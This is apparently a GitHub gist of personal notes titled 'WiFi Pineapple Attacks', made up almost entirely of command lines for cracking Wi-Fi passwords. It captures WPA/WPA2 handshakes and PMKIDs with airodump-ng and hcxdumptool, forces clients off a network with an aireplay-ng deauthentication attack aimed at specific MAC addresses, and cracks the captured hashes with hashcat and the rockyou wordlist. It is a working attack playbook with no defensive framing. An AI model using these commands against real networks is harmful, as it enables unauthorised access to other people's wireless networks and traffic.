Created
December 10, 2019 09:37
-
-
Save hoodoer/83d84813c10f81815bc8511d52811f14 to your computer and use it in GitHub Desktop.
WiFi Pineapple Attacks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
airmon-ng check kill | |
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/ | |
On nano, or other wifi access point monitoring: | |
airmon-ng start wlan1 | |
airodump-ng -w PacketCapture wlan1mon | |
(Then just do near the AP you're wanting to crack and wait for someone to connect to it.) | |
(You could speed this up with a deauth attack as mentioned above.) | |
Once someone has connected to the network, you might want to make sure it was piked up by the nano in case you were too far away or something. | |
To do this, stop the airodump. (Control + C) Then run aircrack-ng PacketCapture-01.cap (It will give you a list of networks. If it says you have handshakes beside it, you're good to go. if not, try again.) | |
You'll need to convert your PacketCapture to a different format using the command | |
!!!SKIP THIS, USE TOOLS BELOW!!! | |
aircrack-ng -J Capture.hccap PacketCapture-01.cap | |
Now go how, take the Capture.hccap file off of your pineapple and store it somewhere on your computer. | |
You'll need to get a large password dictionary. | |
Now that you have all the information recorded in the Capture file, you'll need to crack it. | |
!!!THIS HERE!!!! | |
Ok, get ready for hashcat: | |
root@kaliboxen:~/tools/hashcat-utils/src# ./cap2hccapx.bin PacketCapture-01.cap output.hccapx | |
drews-mbp:hashcat drewk$ ./hashcat -m 2500 output.hccapx ~/VM\ Share/PasswordLists/rockyou.txt | |
************ | |
https://forums.hak5.org/topic/44213-pmkid-attack-on-wifi-pineapples/ | |
https://miloserdov.org/?p=2100 | |
https://www.bitcrack.net/the-pmkid-attack/ | |
Probably works best of the Alfa radio | |
PMKID: | |
Can run this against a wlanXmon device | |
hcxdumptool -o test.pcapng -i wlan2 --enable_status 3 | |
To go completely passive on the hcxdump, add these flags: | |
--disable_ap_attacks --disable_deauthentications --disable_client_attacks --disable_active_scan | |
To target a specific AP (from the awesome bitcrack article above): | |
We now run HCXDumpTool again, using the filter switches and watch as it attacks our target network, waiting for a PMKID. | |
The switches are: | |
–filterlist= To tell the tool which file contains the Mac Addresses | |
–filtermode=2 Tells the tool that these Mac Addresses in –filterlist are our targets, ignore anything else: | |
hcxpcaptool -z test.16800 test.pcapng | |
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' | |
********************* | |
General tricks: | |
# put your network device into monitor mode | |
airmon-ng start wlan0 | |
# listen for all nearby beacon frames to get target BSSID and channel | |
airodump-ng mon0 | |
# start listening for the handshake | |
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 | |
# optionally deauth a connected client to force a handshake | |
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment